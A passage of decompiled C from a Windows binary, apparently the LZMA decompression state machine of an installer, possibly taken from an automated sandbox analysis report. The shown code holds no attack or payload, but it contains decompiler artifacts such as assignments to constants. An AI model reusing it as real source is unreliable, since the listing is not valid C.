											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
